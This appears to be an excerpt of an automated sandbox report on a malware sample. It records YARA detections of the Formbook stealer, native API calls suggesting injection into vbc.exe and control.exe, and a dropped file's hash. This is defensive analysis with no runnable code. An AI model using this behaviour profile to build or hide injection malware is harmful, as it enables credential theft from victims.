Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_004181C0 NtCreateFile,	5_2_004181C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_00418270 NtReadFile,	5_2_00418270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_004182F0 NtClose,	5_2_004182F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_004183A0 NtAllocateVirtualMemory,	5_2_004183A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_004181BA NtCreateFile,	5_2_004181BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0041826A NtReadFile,	5_2_0041826A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409540 NtReadFile,LdrInitializeThunk,	5_2_05409540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054095D0 NtClose,LdrInitializeThunk,	5_2_054095D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409710 NtQueryInformationToken,LdrInitializeThunk,	5_2_05409710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409FE0 NtCreateMutant,LdrInitializeThunk,	5_2_05409FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409780 NtMapViewOfSection,LdrInitializeThunk,	5_2_05409780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054097A0 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_054097A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409660 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_05409660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054096E0 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_054096E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409910 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_05409910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054099A0 NtCreateSection,LdrInitializeThunk,	5_2_054099A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409840 NtDelayExecution,LdrInitializeThunk,	5_2_05409840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409860 NtQuerySystemInformation,LdrInitializeThunk,	5_2_05409860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054098F0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_054098F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409A50 NtCreateFile,LdrInitializeThunk,	5_2_05409A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409A00 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_05409A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409A20 NtResumeThread,LdrInitializeThunk,	5_2_05409A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409560 NtWriteFile,	5_2_05409560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409520 NtWaitForSingleObject,	5_2_05409520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0540AD30 NtSetContextThread,	5_2_0540AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054095F0 NtQueryInformationFile,	5_2_054095F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409760 NtOpenProcess,	5_2_05409760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409770 NtSetInformationFile,	5_2_05409770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0540A770 NtOpenThread,	5_2_0540A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0540A710 NtOpenProcessToken,	5_2_0540A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409730 NtQueryVirtualMemory,	5_2_05409730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409650 NtQueryValueKey,	5_2_05409650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409670 NtQueryInformationProcess,	5_2_05409670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409610 NtEnumerateValueKey,	5_2_05409610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054096D0 NtCreateKey,	5_2_054096D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409950 NtQueueApcThread,	5_2_05409950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054099D0 NtCreateProcessEx,	5_2_054099D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0540B040 NtSuspendThread,	5_2_0540B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409820 NtEnumerateKey,	5_2_05409820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054098A0 NtWriteVirtualMemory,	5_2_054098A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409B00 NtSetValueKey,	5_2_05409B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0540A3B0 NtGetContextThread,	5_2_0540A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409A10 NtQuerySection,	5_2_05409A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05409A80 NtOpenDirectoryObject,	5_2_05409A80
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E595D0 NtClose,LdrInitializeThunk,	8_2_04E595D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59540 NtReadFile,LdrInitializeThunk,	8_2_04E59540
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E596E0 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_04E596E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E596D0 NtCreateKey,LdrInitializeThunk,	8_2_04E596D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59660 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_04E59660
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59650 NtQueryValueKey,LdrInitializeThunk,	8_2_04E59650
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59FE0 NtCreateMutant,LdrInitializeThunk,	8_2_04E59FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59780 NtMapViewOfSection,LdrInitializeThunk,	8_2_04E59780
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59710 NtQueryInformationToken,LdrInitializeThunk,	8_2_04E59710
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59860 NtQuerySystemInformation,LdrInitializeThunk,	8_2_04E59860
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59840 NtDelayExecution,LdrInitializeThunk,	8_2_04E59840
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E599A0 NtCreateSection,LdrInitializeThunk,	8_2_04E599A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59910 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_04E59910
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59A50 NtCreateFile,LdrInitializeThunk,	8_2_04E59A50
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E595F0 NtQueryInformationFile,	8_2_04E595F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59560 NtWriteFile,	8_2_04E59560
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59520 NtWaitForSingleObject,	8_2_04E59520
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E5AD30 NtSetContextThread,	8_2_04E5AD30
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59670 NtQueryInformationProcess,	8_2_04E59670
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59610 NtEnumerateValueKey,	8_2_04E59610
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E597A0 NtUnmapViewOfSection,	8_2_04E597A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59760 NtOpenProcess,	8_2_04E59760
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E5A770 NtOpenThread,	8_2_04E5A770
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59770 NtSetInformationFile,	8_2_04E59770
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59730 NtQueryVirtualMemory,	8_2_04E59730
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E5A710 NtOpenProcessToken,	8_2_04E5A710
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E598F0 NtReadVirtualMemory,	8_2_04E598F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E598A0 NtWriteVirtualMemory,	8_2_04E598A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E5B040 NtSuspendThread,	8_2_04E5B040
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59820 NtEnumerateKey,	8_2_04E59820
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E599D0 NtCreateProcessEx,	8_2_04E599D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59950 NtQueueApcThread,	8_2_04E59950
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59A80 NtOpenDirectoryObject,	8_2_04E59A80
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59A20 NtResumeThread,	8_2_04E59A20
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59A00 NtProtectVirtualMemory,	8_2_04E59A00
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59A10 NtQuerySection,	8_2_04E59A10
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E5A3B0 NtGetContextThread,	8_2_04E5A3B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E59B00 NtSetValueKey,	8_2_04E59B00
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_031083A0 NtAllocateVirtualMemory,	8_2_031083A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_03108270 NtReadFile,	8_2_03108270
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_031082F0 NtClose,	8_2_031082F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_031081C0 NtCreateFile,	8_2_031081C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0310826A NtReadFile,	8_2_0310826A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_031081BA NtCreateFile,	8_2_031081BA

Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Code function: 0_2_00E58D5D	0_2_00E58D5D
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Code function: 0_2_0303CAE4	0_2_0303CAE4
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Code function: 0_2_0303EEA2	0_2_0303EEA2
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Code function: 0_2_0303EEB0	0_2_0303EEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0041B8A3	5_2_0041B8A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0041C23F	5_2_0041C23F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0041C2AF	5_2_0041C2AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0041C3DF	5_2_0041C3DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_00408C60	5_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0041CC13	5_2_0041CC13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0041B4A3	5_2_0041B4A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0041BD9B	5_2_0041BD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0041BE60	5_2_0041BE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0041C603	5_2_0041C603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C0D20	5_2_053C0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05491D55	5_2_05491D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05492D07	5_2_05492D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054925DD	5_2_054925DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F2581	5_2_053F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053DD5E0	5_2_053DD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D841F	5_2_053D841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0548D466	5_2_0548D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0549DFCE	5_2_0549DFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05491FF1	5_2_05491FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053E6E30	5_2_053E6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0548D616	5_2_0548D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05492EF7	5_2_05492EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053E4120	5_2_053E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053CF900	5_2_053CF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05481002	5_2_05481002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0549E824	5_2_0549E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F20A0	5_2_053F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054928EC	5_2_054928EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053DB090	5_2_053DB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054920A8	5_2_054920A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05492B28	5_2_05492B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FEBB0	5_2_053FEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054803DA	5_2_054803DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0548DBD2	5_2_0548DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054922AE	5_2_054922AE
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EDD466	8_2_04EDD466
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E2841F	8_2_04E2841F
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E2D5E0	8_2_04E2D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE25DD	8_2_04EE25DD
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E42581	8_2_04E42581
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE1D55	8_2_04EE1D55
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E10D20	8_2_04E10D20
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE2D07	8_2_04EE2D07
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE2EF7	8_2_04EE2EF7
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E36E30	8_2_04E36E30
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EDD616	8_2_04EDD616
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE1FF1	8_2_04EE1FF1
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EEDFCE	8_2_04EEDFCE
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE28EC	8_2_04EE28EC
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E420A0	8_2_04E420A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE20A8	8_2_04EE20A8
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E2B090	8_2_04E2B090
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EEE824	8_2_04EEE824
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED1002	8_2_04ED1002
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E34120	8_2_04E34120
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E1F900	8_2_04E1F900
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE22AE	8_2_04EE22AE
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED03DA	8_2_04ED03DA
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EDDBD2	8_2_04EDDBD2
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4EBB0	8_2_04E4EBB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE2B28	8_2_04EE2B28
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_030F2FB0	8_2_030F2FB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0310C603	8_2_0310C603
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_030F2D90	8_2_030F2D90
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0310CC13	8_2_0310CC13
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_030F8C60	8_2_030F8C60

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe 767B1B32D4AC4CEC73967590CA5B28C3E0F4D709C0773E3F4021774F15A2483A

Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 04E1B150 appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 053CB150 appears 45 times

Source: J0OmHIagw8.exe	Binary or memory string: OriginalFilename vs J0OmHIagw8.exe
Source: J0OmHIagw8.exe, 00000000.00000002.241605025.000000000442C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs J0OmHIagw8.exe
Source: J0OmHIagw8.exe, 00000000.00000002.242728474.0000000006AF0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs J0OmHIagw8.exe
Source: J0OmHIagw8.exe, 00000000.00000002.242891757.0000000006BE0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs J0OmHIagw8.exe
Source: J0OmHIagw8.exe, 00000000.00000002.242891757.0000000006BE0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs J0OmHIagw8.exe
Source: J0OmHIagw8.exe	Binary or memory string: OriginalFilename2 vs J0OmHIagw8.exe

Source: J0OmHIagw8.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: J0OmHIagw8.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: JcEEHoQdnETCO.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
